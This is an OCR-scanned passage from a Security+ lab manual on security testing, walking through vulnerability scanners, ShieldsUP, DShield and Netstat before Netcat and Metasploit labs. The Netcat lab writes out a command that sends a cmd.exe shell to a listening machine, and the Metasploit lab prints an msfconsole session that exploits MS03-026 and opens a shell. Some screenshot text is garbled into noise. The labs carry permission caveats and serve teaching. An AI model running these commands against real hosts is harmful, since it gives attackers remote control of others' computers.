Adobe Reader 6.0 Filename Handler Buffer Over... Miscellansous  Medium
IP Addiess H Alerter Service a Potential §ecurity Hazard IF Services Low
Sart Yulnerabilities By: Allocate COROMS Registy Laow
Risk. Allacate floppies Regizty Laow =
Generate
(=] Scan Jobs
Active
Job Marne / Status Start Time: End Time Data Source
Completed s e o
& 3:01:00 3:05:00| C:A\Program Files.
Scheduled
= Results -]
The following report containg company confidential information. Do not distribute, email, fax, or transfer via any
electronic mechanism unless it has been approved by the recipient company's security policy. All copies and
backups of this document should be saved on protected starage at all times. Do not share any of the infarmation
contained within this report with anyone unless they are authorized to view the inforrmation. “iolating any of the
presious instructions is grounds for termination

The easy part of vulnerability analysis is finding problems. The hardest
TE work is in the process of assigning individuals the task of plugging each
vulnerability that was discovered.

The final tab is the Report tab. This tab is used to generate the final report. Several
options are available that allow you to simply summarize the findings or format the
findings as an executive report. For this task, choose Executive from the Report Type
drop-down and check all of the Report Section boxes.



424 Phase 8 = Security Testing

| Discover | | Audit | | Remediate | | HReport
= Configuration
[Type Select Report Type
[Options 1 Fpoit Type
‘ Executive EI
Report Section(s)
ulnerabilities By Category
op “Yulnerabilities
Top Open Ports =]
Scan Jobs
=l Results a8
. Information
140
120
100 O Low
a0
&0
hecium
40 .
20
o . High
192.168.123.103
Num. of Vulnerabilities By Risk " of Yulnerabilities By Risk Avy. of Vulnerabhilities By Risk
144 16
16
140 11.01%
120 26.10% 14
100 12
83 10 9
&0 a
&0 6 s [
a0 38 1TE% 45.28% 4 4 B

Criteria for Completion

You have completed this task when you have downloaded Retina, installed it on a Windows
system, and used it to perform a vulnerability scan on one or more systems.

Task 8.3: Performing Assessments
with MBSA

Microsoft Baseline Security Analyzer (MBSA) is a free tool provided by Microsoft to help
security professionals determine their level of security. It provides guidance for improving
the overall security of Microsoft systems. MBSA can also detect missing security patches
and flag potential problems. Its strengths include the following:

s Itis free.
= It provides an easy-to-read, browser-based report.

= It provides links to detailed information of specific weaknesses.
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Scenario

You need to examine several network servers to investigate their overall security level and
make sure they are secure enough to withstand an attack.

Scope of Task

Duration

This task should take about 15 minutes.

Setup

For this task, you will need a Windows XP, Windows Vista, or Windows 7 computer;
access to the Administrator account; and an Internet connection.

Caveat

MBSA may clash with some of the other common security workarounds, and it may not
properly detect some of the Windows updated information.

Procedure

In this task, you will learn how to install and run MBSA.

Equipment Used

For this task, you must have:

= A Windows XP computer

= Access to the Administrator account

s An Internet connection

Details

This task will show you how to install and run MBSA. This program will scan a system
for security vulnerabilities and common misconfigurations.

1. Once you have accessed your Windows computer and logged in as Administrator,
open your browser and go to www.microsoft.com/downloads/en/details
.aspx?FamilyID=ble76bbe-71df-41e8-8b52-c871d012bha78.

You can download the program from this page. Once the program has completed
downloading, execute it from the folder to which it was saved. This will start the
installation process.
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After the installation has completed, you can start MBSA from the shortcut on the
desktop or from the Start menu. The program will give you three options:

= Scan A Computer
= Scan Multiple Computers

= View Existing Security Scan Reports

Microsoft

¥ Baseline Security Analyzer

Check computers for common security misconfigurations.

The Microsoft Baseline Security Analyzer can check computers running Microsoft Windows Server 2008 R2, Windows 7,
Windows® Server 2003, Windows Server 2008, Windows Vista, Windows XP or Windows 2000. Scanning computers for
security updates utilizes Windows Server Update Services. You must have administrator privileges for each computer you want to scan.

b&' Scan a computer
Check a computer using its name or IP Address.

~'q Scan multiple computers
Check multiple computers using a domain name or a range of IF addresses.

sting security scan reports
, print and copy the results from the previous scans.

For this task, choose Scan Multiple Computers. This will allow you to put in a range of
IP addresses and check a range of computers at once.

s Microsoft

¥ Baseline Security Analyzer

Which computers do you want to scan?

Enter the domain name or the range of IP addresses of the computers.

Domain name: I ™

Ip adess range: [192 | [1es | [192 [fies | [125 ]

[260% - %C% (%7%) |

Security report name:

%%D% = domain, %C% = computer, %T% = date and time, %IP% = IP address
Options:
Check for Windows administrative vulnerabilities
Check for weak passwords
Check for 115 administrative vulnerabilities
Check for SQL administrative vulnerabilities
Check for security updates
O Configure computers for Microsoft Update and scanning prerequisites
[ advanced Update Services options:

n using assigned W

Learn more about Scanning Options

3. Once the scan has completed, you will be taken to the View Security Report screen.

This page will describe the findings for each system that was scanned. The report is
broken down into five areas:

Security Update Scan Results This area details which security scans are missing.

Windows Scan Results This area lists Windows vulnerabilities that were discovered.
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Additional System Information This area lists details such as open shares and services.

Internet Information Services Scan This area lists information about IIS, such as
version and patch level.

Desktop Application Scan This area lists details about vulnerable applications.

For each problem found, MBSA provides lists of what was scanned, the scan results,
and instructions on how to correct the problem. Choosing How To Correct This
provides details on the specific security concern and more information on solving the
problem. In this example, we’ve chosen an item that indicates there was a problem with
service packs. MBSA then provides details on service packs and updates so we can
better address the deficiency.

| Microsoft

® ¥ Baseline Security Analyzer

Report Details for WORKGROUP - NEPTUNE (2011-01-13 15:54:38)
Security assessment:
Severe Risk (One or more critical checks failed.)

1P address: 192.168.,123.116

Security report name: VORKGROLP - NEPTUNE (1-13-2011 3-54P1)
Scan date: 1/13/20113:54PM
‘Scanned with MBSA version:

SortOrder: [Score (worst fist) ]
Windows Scan Results
Administrative Vulnerabilties
Score  Issue Result
@ Avtomatc puter. tis feature and then use
Updates

Local Account
Password Test

Incomplete:
Updates

Windows
Frenal

Fie System

I
GuestAccount  The Guest account s not dsabled on tis computer.
canned

properly restrictng anonymous access,
Anonymous canned
Adminstrators  Nomare than 2 Admstrators were found on this computer
asscanned  Result etalls

teck was skipped because the conputer is ot joned to a domain
canned

Il ¢ 60 ac Qs s

Autlogon

]

passiard
Expraton

Additional System Information

Score  Issue Result
@ g Th

[ -

M\cms-:rft_ -
Baseline Security Analyzer

Automatic Updates Check

Issue

Automatic Updates can keep your computer up-to-date automatically with the latest updates from Microsoft by delivering them directly to your computer from the
Microsoft Update site, Windows Update site, or from a local Windows Server Update Services (WSUS) server if you are in a managed environment). MBSA will warn
users if Automatic Updates is not enabled on the scanned computer, or if it is enabled but is not configured to automatically download and install updates. Automatic
Updates is available on Windows® 2000 SP3 computers and higher.

The Automatic Updates control panel settings have been enhanced in Windows XP Service Pack 2, and the steps used to configure the feature have changed from thase
steps documented in MBSA for prior Windows versions. These enhancements also appear in Windows 2000 Service Pack 3 and above for computers that have
automatically updated from Windows Update to obtain the latest Automatic Updates client version.

Solution

Enable and configure Automatic Updates to automatically download and install the latest updates from Microsoft. For more information on Automatic Updates settings,
please refer to the Knowledge Base article on scheduling Automatic Updates in Windows XP, Windows 2000, or Windows Server 2003.

Instructions

‘You must be logged on as a computer administrator to complete this procedure.

To change Automatic Updates settings in Windows Server 2003, Windows XP Professional, or Windows 2000

. Open System, and then dlick the Automatic Updates tab.
Cor-

If you are running Windows 2000, dlick Start, point to Settings, click Control Panel, and then double-click Automatic Updates.

Click Automatic (recommended).

Under r updates for my computer and install them, select the day and time you want Windows to install
Updates.
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Criteria for Completion

You have completed this task when you have downloaded and installed MBSA on a
Windows system and scanned one or more systems for vulnerabilities.

Task 8.4: Performing Security
Assessments with IT Shavlik

Patch management is never an easy task, especially if you are in charge of a large number
of systems. It can seem like a never-ending task. Virulent code, such as Code Red, Nimda,
Nachi, Sobig, and Blaster, has exploited systems that have not been properly patched.

The first step in the patch-management process is to develop a complete network
inventory. The next step is to implement a change-control policy; after all, an inventory list
doesn’t do any good if you can’t track and control changes to your network. With these
things in place, you are ready to begin monitoring for new vulnerabilities and patches
that are available for everything you have identified as being part of your inventory. This
is where tools such as IT Shavlik come in handy. This tool will allow you to verify which
systems are up-to-date and make patch management a painless process.

% You learned how to apply patches in Phase 2, “Hardening Systems.”
TE

Scenario

The organization for which you work has grown very quickly. The firm has now expanded
to three locations. You need to find a way to quickly check systems and verify whether they
are patched or need to be updated. Therefore, you have decided to investigate the I'T Shavlik
software tool.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task, you will need a Windows computer, access to the Administrator account,
and an Internet connection.

Caveat

While patch-management programs can vastly reduce your workload, you should always
test them on a nonproduction system before deploying them into a production environment.
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Procedure

In this task, you will learn how to run the web-based tool IT Shavlik.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Vista, or Windows 7 computer
= Access to the Administrator account

s An Internet connection

Details

This task will show you how to run IT Shavlik. This program will provide you with the
information for those patches installed on the scanned computer.

1. Once you have accessed your Windows computer and logged in as Administrator, open
your browser and go to https://it.shavlik.com/default.aspx. You will need to set
up a username and password to use the web-based tool.

2. Once you have logged in, click Find IT to get started.

find (3

click to start

ﬁx@
forget@

3. You will now be prompted to assess a specific system, network, or range of devices.

Find IT [x]
)My Domain
@My Machine Included Information:

- [ZIHardware & Software
._:.Mach\ne(s) [¥IMissing Security Patches
()Domain(s) [ |Virtual Infrastructure
(1P Range

[¥:5can using my current logged on user credentials

find (D
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4. After you run the tool, it will provide you with a listing that details what patches have
not been installed on the scanned system.

Security Patch Deployment

Criteria for Completion

You have completed this task when you have downloaded IT Shavlik, installed it on a Windows
system, and scanned to verify the system is current with all patches and security updates.

Task 8.5: Performing Internet
Vulnerability Profiling

Internet vulnerability profiling is reviewing what others can see when scanning your systems
from the Internet. Before an attacker can launch an attack, they must know what ports are
open and what potential services are tied to those ports. Once this has been determined, the
attacker can begin to research known vulnerabilities for the applications found.

For the security professional, this means that it is important to know what outsiders and
those on the Internet can access or determine about your network.

Scenario

The organization for which you work has grown quickly. Your manager asked you to run a
quick, low-cost test from several of the organization’s systems to determine what attackers
can see about these systems from the Internet. He has asked you to get this information
together before his 4:00 staff meeting.

Scope of Task

Duration

This task should take about 10 minutes.
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Setup

For this task, you will need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

Scanning activities can trip intrusion detection systems and should therefore be conducted
only with the knowledge of network administrators.

Procedure

In this task, you will learn how to use Gibson Research Corp.’s ShieldsUP, an Internet
vulnerability profiling tool.

Equipment Used

For this task, you must have:

= A Windows computer

= Access to the Administrator account

= An Internet connection

Details

This task will run ShieldsUP. The program will be used to scan your Internet connection
from the Internet side and see what ports are open on your computer. It will also probe your
computer to see if it responds to various requests, such as ICMP echo requests or pings.

Running ShieldsUP
1. Once you have accessed your Windows computer and logged in as Administrator, open

your browser and go to https://www.grc.com/x/ne.d11?bh0Obkyd2.

This URL takes you to the start page of ShieldsUP. This is an Internet-based tool that
will scan your Internet connection and report its security status. You will want to read
the warnings carefully before proceeding.

2. Click the Proceed button to continue and select All Service Ports. This option
will allow the ShieldsUP application to scan all ports on the requested system and
determine what services are opened and closed.

Shields UP 1!

Vulnorabilty Profiling

Greetings!
withou your knowledge or explcit permission, the Windows networking technology Which connects your computer to the Intemet may be offering some or all of your computer's data to the entire world at this very
) moment!

Visssangar pan

5ol p Sperie P rmatn
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After a few minutes, the scan will finish. You can then view the scan results in HTML
or text. A text version of the report is shown here:

GRC Port Authority Report created on UTC: 2011-01-13 at 11:21:14
Results from scan of ports: 0-1055
0 Ports Open

2 Ports Closed
1054 Ports Stealth

_Iggg_Por‘ts Tested

NO PORTS were found to be OPEN.

Ports found to be CLOSED were: 68, 113

Other than what is listed above, all ports are STEALTH.
TruStealth: FAILED - NOT all tested ports were STEALTH,

- NO unsolicited packets were received,
- A PING REPLY (ICMP Echo) WAS RECEIVED.

4. You will want to look over these results closely. Any open ports should be examined to
understand why they are open and what the potential security risks are if these ports
remain open. Common open ports that should be examined closely include 21, 25, 53,
80, 110, 135, 139, and 445.

)’ To learn more about ports, check out www.iana.org/assignments/

AdTE port-numbers.

Scanning for Messenger Spam

1.

ShieldsUP can also be used to scan for Messenger spam. Remember that Microsoft
Windows Messenger Service is on by default on Windows systems that administrators
employ to send messages to users on the network. ShieldsUP can be used to verify the
service has disabled spam.
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2. Return to https://www.grc.com/x/ne.d11?bhObkyd2, click the Proceed button and
choose the Messenger Spam option from the menu.

3. On the Messenger Spam page, choose Spam Me With This Note. This will send several
UDP packets to port 135 in an attempt to spam the Messenger Service. If you receive a
message, the Messenger Service is open.

Shields UFP 1
swpa'TgoursJeIf
Messenger Spam?
Spam Me with this Note |
The Messenger Service can be disabled in the Services menu of
TE Administrative Tools.

Examining Browser Headers

1.

Our final system evaluation of ShieldsUP will be to use the tool to examine browser
leakage. Return to www.grc.com/x/ne.d11?rh1ldkyd2 and click the Proceed button. This
time choose Browser Headers.

Remember that browser header information is transferred each time your browser
makes a request to a web server. Although much of this information may be harmless,
more advanced types of information can sometimes be displayed.

Once you click the Browser Header option, the test will be executed rather quickly and
the screen will return its findings:

Accept:
text/xml,application/xml,application/xhtml+xml,text/html;g=0.9
,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Connection: keep-alive

Host: www.grc.com

Referer: https://www.grc.com/x/ne.d11?rhldkyd?2

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.2)
Gecko/20100316 Firefox/3.6.2

Cookie: temp=3uwyedrty5cfh; perm=luShcenz4lecd
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Content-Length: 32

Content-Type: application/x-www-form-urlencoded
Accept-Charset: IS0-8859-1,utf-8;9=0.7,%;9=0.7
Keep-Alive: 300

FirstParty: https://www.grc.com

ThirdParty: https://www.grctech.com

Secure: https://www.grc.com

Nonsecure: http://www.grc.com

Session: tp50n5rvhm2we

You can see that the version of the browser was uncovered.

4. Look closely through your results to see what type of information was revealed.

One way to hide browser information while browsing is to use a proxy
TE service. You can find an example of one at www. the-cloak.com/

anonymous-surfing-home.html.

Criteria for Completion

You have completed this task when you have run ShieldsUP to examine open ports, scanned for
Messenger spam, and examined what information your browser leaks to other Internet clients.

Task 8.6: Tracking Hostile IPs

Knowing who is connected to your company’s computers and if they are a known attacker is an
important skill for the Security+ certified professional. This task will show you how to identify
hostile IP addresses and determine whether they are connected to any of your computers.

Scenario

The organization for which you work has grown quickly and is concerned that outsiders
may try to access critical servers to steal the company’s secret formulas. You have received
a call about suspicious traffic and have been asked to investigate.

Scope of Task

Duration

This task should take about 15 minutes.
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Setup

For this task, you will need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

When dealing with intrusions, it is important to follow a strict methodology and avoid altering
evidence. If any signs of intrusion are detected, you should contact the organization’s incident-
response team.

Procedure

In this task, you will learn how to use Netstat to identify active connections to your computer.

Equipment Used

For this task, you must have:

= A Windows computer

= Access to the Administrator account

= An Internet connection

Details

In this task you will use the site waw.dshield.org and Netstat. DShield is a site that gathers
log files from users around the world. This task will explore DShield.

Running Netstat
1.  Open Internet Explorer or the browser you use on your Windows computer.

2. Enter the URL for the DShield site: www.dshield.org. DShield is a site operated by the
SANS Internet Storm Center to collect and analyze web traffic and attacks. DShield
collects data about attacks and activity from across the Internet and then parses this
data so users can spot attacks and develop better firewall rules.

Handler on Duty: Chris Mohan

contact us

Handler's Diary: How does yvour family backup their memories?; Blackberry BES Server Updates ...

Internet Storm Center StormCast

Today “s Diary

If you have mare information or corrections regarding our diary, please share,

3. Click on the link at the top of the screen for Data/Reports.
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4. Once on the Data/Reports page, review the most common ports probed. As of this
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writing, the number-one port is 445. Port 135 is the fifth most probed port.

Top 10 Ports

by Reports by Targets by Sources
[port/[Reports| [Port [Targets| [ Port [sources
[4a5 [pamz | [[#a5 [17sn |[#as |[so07
[t433|[+6a5  |||[32R9]509 [135 115
[e0 2823 |||[se00(4s7 B0 114
[te1 |[1e7e  ||[23 =11 [5 J[oz
[443 |[ae+ [135 |[ess EEEEEE
[3389][s24 [+43 248 [1433 |73
[135 |[s21 (506024 [161 6=
[za |[sos [1433[216 [2a692][65
[139 |[+85 [123 [[166 el E
[so00[47s [1434][150 [so60 [[s0

port report

Now determine whether your computer has connections open on port 135. One quick
way to do so is by using Netstat. To start Netstat, open a command prompt and enter
netstat -a, then press Enter. A list of open connections will appear. Shown here is an

example of the output:

C:\>netstat -a
Active Connections

Proto Local Address
TCP neptune:epmap
TCP neptune:

TCP neptune:135
TCP neptune:1038
TCP neptune:1038
TCP neptune:1067
TCP neptune:

TCP neptune:1070
TCP neptune:1082
TCP neptune:1088
TCP neptune:1235
TCP neptune:1237
TCP neptune:2869
TCP neptune:

TCP neptune:

Observe how many connections to port 135 are present. Are these computers in your
own domain? Remember from your studies for the Security+ exam that port 135
is used by NetBIOS and can represent a security threat if accessible by attackers. If

microsoft-ds

netbios-ssn

netbios-ssn
netbios-ssn

Foreign Address
neptune:0
neptune:0
220.80.114.240
neptune:0
neptune:1235
Tocalhost:1066
neptune:0
www.cnn.com:http

www . hackthestack.com
4.2.2.2
ftp.sybex.com: ftp
www . sybex . com
192.168.123.254:1298
neptune:0

neptune:0

State
LISTENING
LISTENING
LISTENING
LISTENING
ESTABLISHED
ESTABLISHED
LISTENING
CLOSE_WAIT
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
ESTABLISHED
LISTENING
LISTENING


http://www.sybex.com

connections to your computer by computers outside your domain are present, write
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down the IP address of those connections.

7. With these IP addresses recorded, first look to see if there is a match in the list of
top 10 reported IPs. If so, note that this IP address has already been reported as a

malicious IP.

8. Enter the recorded IP address from step 6 in the Port/IP Lookup/Search box found

Top 10 Source IPs

IP Address Reports Attacks First Seen Last Seen
218.064.215.239 188,930 113,719 2010-11-10 2011-01-13
210.051.052,132 86,302 85,704 2010-11-192011-01-13
211.138.238.198 807,115 80,858 2010-12-22 2011-01-13
122,225.218.234 93,083 73,297 2010-08-202011-01-13
222.186,031,157 248,023 70,569 2010-12-28 2011-01-13
222.186,025.032 552,954 65,314 2010-12-07 2011-01-13
061.191.056.189 115,186 65,206 2011-01-07 2011-01-13
117.041.229.202 65,315 65,045 2011-01-092011-01-13
061.090.198.171 589,797 64,337 2009-12-04 2011-01-13
199.015.234.019 67,412 63,514 2010-12-102011-01-13

Top Sources
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on the upper-right corner of the web page. This is the location of DShield’s IP address
database. Where are the remote computers located?

Many attacks come from a cluster of IP addresses in developing countries, including
China, Pakistan, and India. Any address that is found to repeatedly target your

IP Info (218.64.215.239)

IP address (click for more detail):
Hostname:

Country:

AS:

A5 Mame:

MNetwork:

Reports:

Targets:

First Reparted:

Most Recent Report:
Comment:

218.64.215.239
218.64.215.239
CH

4134
CHINANET-BACKBONE MNo.31,Jin-rong Street
218.64.192.0/19
188930

113719
2010-11-10
2011-01-13

- none -

company should be blocked at the corporate firewall.

TE

If you would like to participate in the DShield process, you can download

a client that will allow your firewall’s alerts to be added to the DShield

database. The client is available at https://secure.dshield.org/howto
.htm1. It works with most firewalls.
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Criteria for Completion

You have completed this task when you have used DShield and Netstat to learn what IP
addresses are connected to your local system on port 135.

Task 8.7: Investigating Netcat

One of the interesting things about security tools is that everybody uses them. Security tools
are used by security professionals but also by hackers. One of the first security assessment
tools was Satan. While Satan helped secure networks, it could also be used by attackers to
scan networks for vulnerabilities. Our next task uses a very similar tool, Netcat. Netcat can
be a useful tool for establishing remote connections.

Scenario

The organization for which you work has become more concerned about security and
would like you to demonstrate the need for better security controls. You have decided to
use Netcat, the Swiss Army knife of security tools, to demonstrate how establishing remote
connections are performed.

Scope of Task

Duration
This task should take about 15 minutes.

Setup

For this task, you will need two Windows computers, access to the Administrator account,
and an Internet connection.

Caveat

Tools such as Netcat may be flagged by some antivirus tools as malicious. You should also
practice caution when downloading unknown tools. You should always check out a tool on
a closed test network before deploying live.

Procedure

In this task, you will learn how to use Netcat, a security-assessment tool.
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Equipment Used

For this task, you must have:

s Two Windows computers

= Access to the Administrator account

= An Internet connection

Details
This task will run Netcat, a command-line security tool. It will be used to perform banner
grabbing, to scan ports, and to open a remote connection.

Installing and Using Netcat

1. Once you have accessed your Windows computer and logged in as Administrator, open
your browser and go to http://webscripts.softpedia.com/script/Networking-
Tools/Netcat-27515.html.

This will take you to the download page of the Windows version of Netcat.

)’ If you would like more details from the creator, you can find their site at
AdTE http://netcat.sourceforge.net/.

2. Choose the Download link to start the download.

3. When the download finishes, place the tool into the path so that when you open a
command prompt the program can be easily found.

If your virus scanner complains about running Netcat, you will need to
TE disable it for the duration of this task.
4. Before starting the scanning process, take a moment to review some common Netcat
switches. Start your Windows computer and open a command prompt by choosing

Start » Run and entering emd. Type nc -h from the command line to review Netcat
options. The response will look similar to the following:

connect to somewhere: nc [-options] hostname port[s] [ports]
Tisten for inbound: nc -1 -p port [options] [hostname] [port]
options:

-d detach from console, background mode

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12,

-i secs delay interval for lines sent, ports scanned

-1 Tisten mode, for inbound connects
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-L Tisten harder, re-Tisten on socket close
-n numeric-only IP addresses, no DNS

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-s addr Tocal source address

-t answer TELNET negotiation

-u UDP mode

-V verbose [use twice to be more verbose]

Port Scanning with Netcat

1. Netcat can be used as a simple port scanner; to do so, enter the following at the
command line: nc -v -w 2 -z IP_address 21-110.
Replace IP_address with the IP address of the second Windows computer.
The previous command requests that Netcat try every connection between ports 21
and 110 at the targeted IP address. This would tell you the status of such ports as FTP,
Telnet, DNS, and POP3.
4. These are the ports that attackers typically target. Notice the results obtained when we
ran the tool:
C:\temp>nc -v -w 2 -z 192.168.123.254 21-110
192.168.123.254: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.123.20] 21 (ftp) open
(UNKNOWN) [192.168.123.20] 53 (dns) open
(UNKNOWN) [192.168.123.20] 80 (http) open
5. What were the results? Were you able to identify any open ports? If so, you will want
to investigate why these ports are open and if these services are actually needed.
Practicing the principle of “deny all” is one of the most important things a
A TE security professional can do.

Grabbing Banners with Netcat

1.

Netcat is truly a tool of many functions. This part of the task will demonstrate how to
use Netcat to grab banners.

Use Notepad to create a text file named header.txt with the following content:

HEAD / HTTP/1.0

<ENTER>

<ENTER>

Run Netcat as follows and enter the IP address of the second Windows system you
have running: nc -v IP_address Port 80 < header.txt.
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4. For this exercise, we ran the tool against 192.168.123.1 and the results are shown here:
Apache/2.0.48-dev (Unix)
Server at 192.168.123.1 Port 80</address>

Responses will vary depending on the version of the web server running or
TE whether the banner has been altered. Some system administrators block

the service identifier.

Using Netcat to Shovel a Shell

1. Many individuals wonder how attackers use remote systems to launch attacks. One
of Netcat’s most interesting features is its ability to open a connection on a remote
system. Make sure Netcat is loaded on both of your Windows computers.

The two Windows computers will be called Windows1 and Windows2. Windows1 will
serve as the attacker and Windows2 will serve as the victim.

2. On Windows1, open a command prompt and enter the following command: nc -n -v
-1 -p 80.
This command will cause Netcat to listen on port 80 for a connection from Windows2.

3. On Windows2, open a command prompt and enter this command:

nc —n Windowsl_IP_Address 80 —e "cmd.exe"
Be sure to replace Windows1_IP_Address with the IP address of Windows1.

4. Once you enter the command, return to Windows1 and observe the command prompt
where Netcat is listening. If you have entered the commands successfully, you will see
a standard Windows banner. Type IP config and confirm that the IP address is the
address of Windows?2.

5. At this point, you are running commands on Windows2. Had this been a real attack,
this system would be in serious danger of being fully compromised.

To fully grasp the danger such tools possess, just consider that the
TE attacker is now running their programs on your computer. For a good set
of guidelines of safe security practices, review the “10 Immutable Laws of

Security” at www.microsoft.com/technet/archive/community/columns/
security/essays/10imlaws.mspx?mfr=true.

Criteria for Completion

You have completed this task when you have run Netcat to scan ports, perform banner
grabbing, and open a remote shell. You should now see how some tools can be used by
both security professionals and attackers.
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Task 8.8: Exploiting Vulnerabilities
with Metasploit

Patching continues to be of critical importance to the security professional. The importance
of a good patch-management program cannot be emphasized enough. Sometimes
management may ask to see why such activities are so important. The objective of this task
is to demonstrate how easily an unpatched computer can be exploited.

Scenario

The organization for which you work has become more concerned about security and
would like you to demonstrate the need for patch management. You have been asked to
target an unpatched system and show how easily such systems can be attacked.

Scope of Task

Duration

This task should take about 15 minutes.

Setup

For this task, you will need two Windows computers, access to the Administrator account,
and an Internet connection.

Caveat

Tools such as Metasploit can be used by security professionals for penetration testing but
can also be used for illegal activity. Always make sure you have permission to use these
tools before targeting any systems.

Procedure

In this task, you will learn how to use Metasploit, a penetration-testing tool.

Equipment Used

For this task, you must have:

= Two Windows computers; at least one of which needs to be an unpatched XP system
= Access to the Administrator account

= An Internet connection
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Details

This task will run Metasploit, a penetration-testing tool that has the ability to target
unpatched systems.

Installing and Using Metasploit

1. Once you have accessed your Windows computer and logged in as Administrator, open

your browser and go to www.metasploit.com/framework/download/.

This will take you to the download page of the Windows version of Metasploit.

% Metasploit is available in both free and commercial versions.
A TE

2. Once the program has completed downloading, execute it from the folder to which it
was saved. This will start the installation process.

3.  Once the installation is completed, you can launch Metasploit. From the Start menu,
choose the Metasploit GUI. Metasploit gives you three interface options from the Start
menu once the application is installed:

= Metasploit Console
= Metasploit GUI
= Metasploit IRB

File Exploits Auxiliary Payloads History PostExploit Console Datsbase Plugins Help

635 exploit 314 auxiliary 215 payload modules
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If your virus scanner complains about running Metasploit, you will need to
TE disable it for the duration of this task.

Before you proceed, record the IP addresses for the system you are

TE launching Metasploit from and the system you are targeting.
RHOST: The remote host you are targeting:

LHOST: The local host:

4. You can view exploits by choosing the Exploits option. For this task use the RPC
DCOM vulnerability. You can find it by choosing Exploits » Windows » idcerpc »
MS03_026_dcom.

Callout+ Chara » Arial | antivirus » - B 7 U
arkeia 3

backdoor »
backupexec »
brightstor »
browser 3
dcerpc ¥ ms03_026_dcom
driver ¥ ms05_017_msmq
email ¥ ms07_029_msdns_zonename
emc »  ms07_065_msmg
fileformat »
firewall 3
ftp 3
games ]
http 3
iis 3
— . imap »
. I'msfgur isapi ,
Expluits Idap » | History Post-Exploit Console Database
Jobs | aix *  license ¥ s || Everits [ hiotes [[Laots |
bsdi Y lotus »
dialup ¥ Ipd »
freebsd »  misc »
hpux  »  mmsp »
irix »  motorola
linux Y mssql »
multi Y mysql »
netware »  nfs »
0sx Y nntp »
solaris »  npovell »
unix * orade ]
m More... >

This exercise uses Metasploit to examine the RPC DCOM (Direct Component
TE Object Model) vulnerability in unpatched Microsoft Windows products.
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6. Enter the IP address of the RHOST and verify it is correct. You will be prompted to

7.
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Choose the reverse TCP Shell.

Targets

(3) Windows NT SP3-6a{2000/XP{2003 Universal

2= windows

{5 vncinject

(53 upeec

# shel_reverss_tep
# shell_bind_tep_xpfu
# shell_bind_tcp

{5 shel

reverse_tep_dns

reverse_ord_tcp

reverse_non:_tep
reverse_ipve_tcp
reverse_fittp
bind_tcp
bind_norve_tcp

- bind_jpve_tcp
{3 patchupmeterpreter

LA R E R RN R EE]

(]

continue; then click Run In Console.

TITLE Messagebox Title (rnax 255 chars)
MessageBox

PXURI The URI root for requests
JYpB1PmtbmGHYE IoSUEIDATX L WKODME

RHOST The target address

Once the exploit executes successfully, you will see an indication that a new session

was started.

=[ metasploit w3.5.1l-release [core:3.5 api:l.0]
+ -- --=[ 635 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - § nops

=[ s rl1338 updated 35 days ago (2010.12.14)

Warning: This copy of the Metasploit Framewsrk was last updated 35 days ago.
Te recommend that you update the framevork at least every other day.
For information on updating your copy of Metasploit, please see:
heep: /fww, netasploit. con/reduine /projects/franework /riki Updating

usf exploit(us03_Dz6_dcom] > use exploit/windsws/deerpc/ms03_026_dcon
wsf exploit(ms03_026_dcom] > set PAYLOAD windows/shell bind tep
PAYLOAD => windows/shell bind_tcp

wsf exploit(ms03_026_dcom] > set LHOST 192.168.123.116

LHOST => 192.168.123.116

wsf exploit(ms03_026_dcom] > set RHOST 192.168.123.33

FHOST => 192.168.123.33

wsf exploit(ms03_026_dcom] > exploit

[#] Started bind handler

[*] Trying target Windows NT $P3-6a/2000/XP/2003 Universal...

[#] Sending exploit ...
[*] Exploit completed, session was created.

msf exploib(ms03_026_deom) >

[*] Binding to 4d9fdah&-7dlc-1lcf-86le-0020af6e7c57: 0. 0Bncacm_ip_top: 192.168.123.33[135] ...
[*] Bound to 4d9£4abB-Tdlc-llcf-86le-0020afée7c57:0. 0Bncacn ip tcp:l92.168.123.33[135] ...

445
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8. In the session window, type ipconfig. Notice the IP address is that of the victim system.

C:\>ipconfig

Windows IP Configuration
Ethernet adapter Local Area Connection 1:

Connection-specific DNS Suffix

IP Address. . . . . . . . . . . . :192.168.123.33
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.123.254
Once attackers can run their tools on your system, they are positioned to
TE strengthen their control of your computer and most likely will use it to target

other systems.To learn more about hackers and hacking tools, check out
www. pbs.org/wgbh/pages/frontline/shows/hackers/whoare/tools
.htm1 for a great list of hacking tools and techniques.

Criteria for Completion

You have completed this task when you have run Metasploit against an unpatched
computer and gained a command prompt on the computer.
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Well, it’s happened. Somehow, in spite of all your hard work

researching technology and devices; planning, budgeting, and

managing; and implementing and training, a security breach
has occurred.

What now? How should you proceed? What should you do first? What should you do
after that? You know that over the next few weeks or months, the big shots will study every
move you’ve made, and that they’ll find some level of fault with every step you took.

In the midst of the chaos of the incident, as the head of the Computer Emergency Response
Team (CERT), which might also be called the Computer Security Emergency Response Team
(CSERT) or the Computer Incident Response Team (CIRT), you must rise to the role of
leader. This means you must have a plan and a team. The plan must be rehearsed. That team
must be trained. The training must be ongoing, and the process must be updated using the
latest tools and technologies. The team must be ready to react at a moment’s notice, 24/7—
not to mention the legalistic mumbo-jumbo youw’ll have to deal with.

You have auditing and intrusion detection systems (IDSs) in place. Your plan is in place.
Your team is trained, rehearsed, and ready to go. Both you and they know what to do and
how to do it. Your team knows how to investigate the telltale clues that were left behind
by the attacker. They know how to identify, protect, collect, document, store, analyze,
transport, and present the evidence to reach conclusions about how the incident occurred.
This may be done for “lessons learned,” so you’ll know how to strengthen your system
against this type of attack. This may be done for evidence preparation for prosecution, to
put the attacker behind bars.

Investigating computer-related incidents is a highly evolved and refined process, and
even more, a highly refined science. Your initial job is to stop the bleeding and stabilize the
patient. In this case, that means you don’t allow the attack to continue, and you quickly
assess the rest of the system to see if this is an isolated incident or if there is a wider attack
